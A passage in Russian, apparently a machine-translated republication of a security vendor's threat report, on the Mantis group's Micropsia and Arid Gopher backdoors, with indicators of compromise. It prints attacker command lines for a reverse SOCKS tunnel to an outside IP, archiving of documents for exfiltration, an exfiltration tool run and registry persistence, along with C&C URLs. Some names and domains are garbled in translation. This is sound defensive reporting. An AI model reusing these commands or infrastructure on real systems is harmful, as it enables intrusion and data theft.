контексты
Mantis ведет активную деятельность с 2014 года, но некоторые сторонние источники сообщают, что она могла действовать еще в 2011 году. Группа известна тем, что атакует организации в Израиле и некоторых других странах Ближнего Востока. Среди целей - правительство, вооруженные силы, финансы, СМИ, образование, энергетика и аналитические центры. Группа известна тем, что использует фишинговые письма и фальшивые профили в социальных сетях, чтобы заманивать цели и устанавливать на их устройства вредоносное ПО.
Широко распространено мнение, что Mantis связана с палестинскими территориями. Symantec не может точно определить принадлежность к какой-либо палестинской организации, хотя другие производители связывают эту группу с ХАМАС.
В своей последней атаке группа использовала обновленные версии бэкдоров Micropsia и Arid Gopher для заражения целей, а затем широкомасштабную кражу учетных данных и утечку похищенных данных.
цепь атак
Первоначальный путь заражения в этой кампании неясен. В одной из организаций, ставшей объектом атаки, злоумышленники развернули три разные версии одного и того же набора инструментов (т. е. разные варианты одного и того же инструмента) на трех наборах компьютеров. Изолирование атаки таким образом, вероятно, является мерой предосторожности. Если один из наборов инструментов будет обнаружен, злоумышленник все равно сможет сохранить свое постоянное присутствие в целевой сети.
Ниже приведено описание использования одного из трех наборов инструментов:
Вредоносная активность была впервые обнаружена 18 декабря 2022 года. Три отдельных набора обфусцированных команд PowerShell выполнялись для загрузки Base64-кодированной строки, которая запускала встроенный шеллкод. шеллкод - это 32-битный загрузчик, который использует базовый протокол TCP для загрузки шеллкода с сервера Command and Control (C&C): 104.194.222[...] 50 порт 4444 для загрузки другого этапа.
Злоумышленники вернулись 19 декабря, сначала выполнив дамп учетных данных, а затем используя Certutil и BITSAdmin для загрузки бэкдора Micropsia и Putty, общедоступного SSH-клиента.
Затем Micropsia была запущена и начала связываться с C&C-сервером. В тот же день Micropsia была запущена еще на трех машинах в той же организации. В каждом случае она запускалась в папке, названной по имени файла:
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
На одном из компьютеров с помощью Micropsia был создан обратный socks-туннель к внешнему IP-адресу:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.] 50:443 [отредактировано]
20 декабря с помощью Micropsia на одном из зараженных компьютеров был запущен неизвестный исполняемый файл windowspackages.exe.
На следующий день, 21 декабря, RAR был запущен для архивации файлов на другом зараженном компьютере.
С 22 декабря по 2 января 2023 года Micropsia использовалась для запуска бэкдора Arid Gopher на трех зараженных компьютерах. Arid Gopher, в свою очередь, использовался для запуска инструмента SetRegRunKey.exe, который обеспечивает выполнение Arid Gopher при перезагрузке путем добавления его в реестр для обеспечения постоянство. Он также запускает неизвестный файл с именем localsecuritypolicy.exe (злоумышленник использует это имя в других местах в качестве бэкдора Arid Gopher).
28 декабря Micropsia использовалась для запуска windowspackages.exe на трех других зараженных компьютерах.
31 декабря Arid Gopher выполнил на двух зараженных компьютерах два неизвестных файла с именами networkswitcherdatamodell.exe и networkuefidiagsbootserver.exe.
К 2 января злоумышленники деактивировали использовавшуюся ими версию Arid Gopher и внедрили новый вариант. Было ли это связано с тем, что первая версия была обнаружена, или со стандартной операционной процедурой, пока неясно.
4 января с помощью Micropsia на одном компьютере были запущены два неизвестных файла, оба с именем hostupbroker.exe, из папки: csidl_common_appdata\hostupbroker\hostupbroker.exe. За этим сразу же последовала утечка RAR-файла:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar
9 января Arid Gopher был использован для выполнения двух неизвестных файлов на одном компьютере:
csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embeddedmodeservice\embeddedmodeservice.exe
Последняя вредоносная активность наблюдалась после 12 января, когда Arid Gopher использовался для выполнения неизвестного файла с именем localsecuritypolicy.exe каждые десять часов.
Micropsia
Вариант бэкдора Micropsia, использовавшийся в этих атаках, похоже, является слегка обновленной версией версии, замеченной другими производителями. В этой кампании Micropsia была развернута с использованием нескольких имен файлов и путей к ним:
csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia использует WMI для выполнения, и его основная цель, по-видимому, заключается в запуске вторичных полезных нагрузок злоумышленника. К ним относятся:
Arid Gopher (имена файлов: networkvirtualisationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
Туннелер обратных SOCKs (он же Revsocks) (имя файла: windowsservicemanageav.exe)
Инструмент для эксфильтрации данных (имя файла: windowsupserv.exe)
Два неизвестных файла, оба с именем hostupbroker.exe
Неизвестное имя файла windowspackages.exe
Кроме того, Micropsia имеет свои собственные функции, такие как скриншоты, кейлоггинг и архивирование определенных типов файлов с помощью WinRAR для подготовки к утечке данных:
"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" a-r -ep1 -v2500k -. hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%*.xls" " %USERPROFILE%*.xlsx" "%USERPROFILE%*.doc" "%USERPROFILE%*. docx" "%USERPROFILE%*.csv" "%USERPROFILE%*.pdf" "%USERPROFILE%*.ppt" "%USERPROFILE%*.pptx" " %USERPROFILE%*.odt" "%USERPROFILE%*.mdb" "%USERPROFILE%*. accdb" "%USERPROFILE%*.accde" "%USERPROFILE%*.txt" "%USERPROFILE%*.rtf" "%USERPROFILE%*.vcf"
Засушливый суслик
В отличие от Micropsia, которая написана на Delphi, Arid Gopher написан на Go. Версия Arid Gopher, используемая в этой кампании, содержит следующие встроенные компоненты:
7za.exe - легальная копия исполняемого файла 7-Zip
AttestationWmiProvider.exe - инструмент для установки значения "Run" в реестре
ServiceHubIdentityHost.exe - копия легального исполняемого файла Shortcut.exe от Optimum X.
Setup.env - файл конфигурации
Arid Gopher также используется для запуска следующих неизвестных файлов: networkswitcherdatamodell.exe, localsecuritypolicy.exe и networkuefidiagsbootserver.exe, а также для загрузки и выполнения файлов, обфусцированных с помощью Обфусцированные файлы PyArmor.
При общении с C&C-сервером Arid Gopher регистрирует устройство по одному пути, а затем подключается к другому, возможно, для получения команд:
Подключение к: http://jumpstartmail[.] com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.] 134) - возможно, для регистрации устройства
Далее следует: http://jumpstartmail[...] com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, для того, чтобы получить команду
Подключение к: http://salimafia[.] net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.] 32) - Возможно, для регистрации устройства
Далее следует: http://salimafia[...] net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, для того, чтобы получить команду
Судя по всему, Arid Gopher регулярно обновляется и переписывается злоумышленниками, вероятно, чтобы избежать обнаружения. Один из вариантов вредоносной программы настолько отличается от уникального кода предыдущих версий, что ни одна из подпрограмм не содержит того же уникального кода, что и предыдущая версия. Похоже, что Mantis активно переставляет логику между вариантами, что является трудоемкой операцией, если делать это вручную.
| Команда | Описание |
|---|---|
| "c" | Возможно, это связано с main.exC("cmd"). |
| "d" | Возможно, связано с main.down2 |
| "s" | Возможно, связано с main.OnDSH |
| "ci" | Возможно, связано с main.deviceProperties |
| "ps" | Возможно, это связано с main.exC("powershell") |
| "ра" | Возможно, это связано с main.RunAWithoutW |
| "sf" | Возможно, связано с main.updateSettings |
| "sl" | Возможно, связано с main.searchForLogs |
| "ua" | Возможно, связано с main.updateApp |
| "ut" | Возможно, связано с main.updateT |
| "pwnr" | Возможно, это связано с main.exCWithoutW("powershell") |
| "рапп" | Возможно, это связано с main.restartApp |
| "гелог" | Возможно, связано с main.upAppLogs |
| "ufbtt" | Возможно, это связано с main.collectFi |
| "ufofd" | Возможно, связано с main.collectFiOrFol |
| "bwp" | Возможно, связано с main.browDat |
| "cbh" | Возможно, связано с main.delBD |
| "cwr" | Возможно, это связано с main.exCWithoutW("cmd"). |
| "гаф" | Возможно, это связано с main.collectFi |
| "ntf" | Возможно, связано с main.collectNet |
| "смр" | Возможно, связано с main.updateSettings |
Встроенный файл setup.env используется анализируемым вариантом Arid Gopher для получения конфигурационных данных и содержит следующее:
DIR=WindowsPerceptionService
ENDPOINT=http://jumpstartmail[.] com/IURTIER3BNV4ER
LOGS=logs.txt
DID=code.txt
VER=6.1
EN=2
ST_METHOD=r
ST_MACHINE=false
ST_FLAGS=x
КОМПРЕССОР=7za.exe
DDIR=ResourcesFiles
BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002
SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB
STAPP=AttestationWmiProvider.exe
SHORT_APP=ServiceHubIdentityHost.exe
Файл конфигурации setup.env ссылается на другой файл, AttestationWmiProvider.exe, также встроенный в Arid Gopher. Этот файл представляет собой 32-битный исполняемый файл, используемый в качестве помощника для обеспечения запуска другого исполняемого файла при перезагрузке. При запуске он проверяет следующие параметры командной строки:
"ключ" со строковым аргументом [RUN_VALUE_NAME]
"значение" со строковым аргументом [RUN_PATHNAME]
Затем он организует получение уведомления от сигнала с помощью функции func os/signal.Notify(). Получив уведомление, он устанавливает следующее значение реестра:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "[RUN_VALUE_NAME]" = "[RUN_ PATHNAME]"
Наши исследования показали, что этот файл устанавливает Arid Gopher на запуск при перезагрузке:
CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualisationStartService "-value= CSIDL_COMMON_APPDATA\networkvirtualisationstartservice\networkvirtualizationstartservice.exe -x"
инструмент для борьбы с утечкой данных
Злоумышленники также использовали специальный инструмент для утечки данных, украденных у целевой организации: 64-битный исполняемый файл PyInstaller под названием WindowsUpServ.exe. При запуске инструмент проверяет наличие следующих параметров командной строки:
"-d" "[FILE_DIRECTORY]"
"-f" "[FILENAME]"
Для каждого аргумента командной строки "-f" "[FILENAME]" инструмент загружает содержимое папки [FILENAME]. Для каждого аргумента командной строки "-d" "[FILE_DIRECTORY]" инструмент получает список файлов, хранящихся в папке [FILE_DIRECTORY], и загружает содержимое каждого из них.
При загрузке каждого файла инструмент отправляет HTTP POST-запрос на C&C-сервер со следующими параметрами:
"kjdfnqweb": [THE_FILE_CONTENT]
"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]
Если удаленный сервер отвечает кодом состояния 200, вредоносная программа удаляет загруженные файлы с локального диска. Вредоносная программа также может записывать некоторые из своих действий в следующие файлы:
"C:\ProgramData\WindowsUpServ\success.txt"
"C:\ProgramData\WindowsUpServ\err.txt"
Решительный соперник
Судя по всему, Mantis - решительный противник, готовый тратить время и силы на то, чтобы максимально увеличить свои шансы на успех, о чем свидетельствуют обширная переработка вредоносного ПО и его способность разделять атаки на отдельные организации на несколько отдельных частей, чтобы снизить вероятность обнаружения всей операции.
Показатели МОК
| хэш SHA256 | Имя файла | Описание |
|---|---|---|
| 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Засушливый суслик |
| 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualisationpicservice.exe | Засушливый суслик |
| 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 | networkvirtualisationfiaservice.exe | Засушливый суслик |
| 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualisationinithservice.exe | Засушливый суслик |
| cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualisationfiaservice.exe | Засушливый суслик |
| f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 | networkvirtualisationstartservice.exe | Засушливый суслик |
| 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe | Компонент постоянства Arid Gopher |
| 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 | windowsupserv.exe | Инструмент эксфильтрации |
| 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Инструмент эксфильтрации |
| 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Разное | Micropsia |
| 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | Н/Д | Micropsia |
| 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe | Micropsia |
| d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia |
| 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 | networkvirtualisationseoservice.exe | Возможный засушливый суслик |
| f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 | runme.exe | Возможный измерительный прибор |
| c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b | systempropertiesinternationaltime.exe | Возможна микропсия |
| f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel |
| 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | Н/Д | Shellcode |
| 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d | Н/Д | Shellcode |
| 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 | Н/Д | Shellcode |
| 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e | SystemPropertiesInternationalTime.rar | Неизвестный файл |
| 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Неизвестный файл |
| 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Неизвестный файл |
| 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Неизвестный файл |
| 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Неизвестный файл |
| 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll | Неизвестный файл |
| 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embeddedmodeservice.exe | Неизвестный файл |
| 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe | Неизвестный файл |
| b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embeddedmodeservice.exe | Неизвестный файл |
| bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe | Неизвестный файл |
| bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Неизвестный файл |
| d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe | Неизвестный файл |
| jumpstartmail[.] com | Засушливый суслик C&C | |
| paydayloansnew[.] com | Засушливый суслик C&C | |
| картинный мир[.] информация | Засушливый суслик C&C | |
| rnacgroup[.] com | C&C | |
| salimafia[...] сеть | Засушливый суслик C&C | |
| seomoi[...] net | Засушливый суслик C&C | |
| soft-utils[.] com | C&C | |
| chloe-boreman[.] com | Микропсия C&C | |
| criston-cole[.] com | Микропсия C&C | |
| http://5.182.39[.] 44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu | Инструмент эксфильтрации C&C |
Оригинальная статья написана Chief Security Officer, при воспроизведении просьба указывать: https://cncso.com/ru/богомол-использовался-в-атаках-на-пал.
